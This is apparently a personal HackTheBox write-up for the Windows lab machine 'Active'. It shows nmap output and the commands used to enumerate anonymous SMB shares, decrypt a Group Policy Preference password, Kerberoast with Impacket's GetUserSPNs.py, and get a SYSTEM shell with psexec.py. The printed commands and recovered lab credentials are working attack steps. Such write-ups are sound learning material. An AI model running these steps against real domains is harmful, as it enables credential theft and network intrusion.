We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Fri Jul 2 05:11:00 2021 as: nmap -sC -sV -oA nmap 10.10.10.100 Nmap scan report for 10.10.10.100 Host is up (0.39s latency). Not shown: 981 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 82/tcp filtered xfer 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-02 12:13:11Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 2383/tcp filtered ms-olap4 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: |_clock-skew: 3h00m56s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-07-02T12:14:16 |_ start_date: 2021-07-02T04:37:58 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jul 2 05:13:37 2021 -- 1 IP address (1 host up) scanned in 157.11 seconds
Windows and it my first on HackTheBox so we have many ports so i start my enumeration on the SMB port to check if anonymous logins is allowed.
smbclient -L //10.10.10.100/ -N
I decided to use
SMBMAP also to check which of the share we have access to.
smbmap -H 10.10.10.100
Seems we have read permission on the
Replication share let use
smbclient to log in.
smbclient //10.10.10.100/Replication -N
Going through all files in the share i found something cool with credentials store in it.
I try doing some research on the
Groups.xml file i got on the SMB share.
Group Policy Preference (GPP) file. GPP was introduced with the release of Windows Server 2008 and it allowed for the configuration of domain-joined computers. A dangerous feature of GPP was the ability to save passwords and usernames in the preference files. While the passwords were encrypted with AES, the key was made publicly available.
So if we managed to compromise any domain account, we can simply grab the groups.xml file and decrypt the passwords.
Now we know we are on the right track let hit it. We have a username also a password which is encrypted let find a way to decrypt it.
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ GPPstillStandingStrong2k18
gpp-decrypt is present on kali and gpp-decrypt is a simple ruby script that will decrypt a given GPP encrypted string.
We know have a valid credentials to get access to the machine username:
GPPstillStandingStrong2k18 also we know we are working on a active directory machine we can use the credentials we have now to query for a ticker.
Now let’s try a technique known as Kerberoasting. Kerberoasting is one of the most common attacks against domain controllers. It is used to crack a Kerberos (encrypted password) hash using brute force techniques.
If you compromise a user that has a valid kerberos ticket-granting ticket (TGT), then you can request one or more ticket-granting service (TGS) service tickets for any Service Principal Name (SPN) from a domain controller. An example SPN would be the Application Server shown in the above figure.
A portion of the TGS ticket is encrypted with the hash of the service account associated with the SPN. Therefore, you can run an offline brute force attack on the encrypted portion to reveal the service account password. Therefore, if you request an administrator account TGS ticket and the administrator is using a weak password, we’ll be able to crack it!
Now time for us to use
Impacket and it can easily be install with the command below;
git clone https://github.com/SecureAuthCorp/impacket.git cd impacket/ python setup.py install #install software
Done installing we will be using the ` GetUserSPNs.py` script let try to locate it.
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
And boom We were able to request a TGS from an Administrator SPN.
If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it because of your local time, you need to synchronise the host with the DC:
ntpdate IP of DC
Now that we have the hash let crack it using john the ripper save in a file name
We have credentials for administrator now let use
psexec.py to get access to it through the SMB share.
we are system let go get the flags lol.
Now let get the administrator Flag.
We are done damn it right actually my first Windows machine more to come and keep updating.
Greeting From Muzec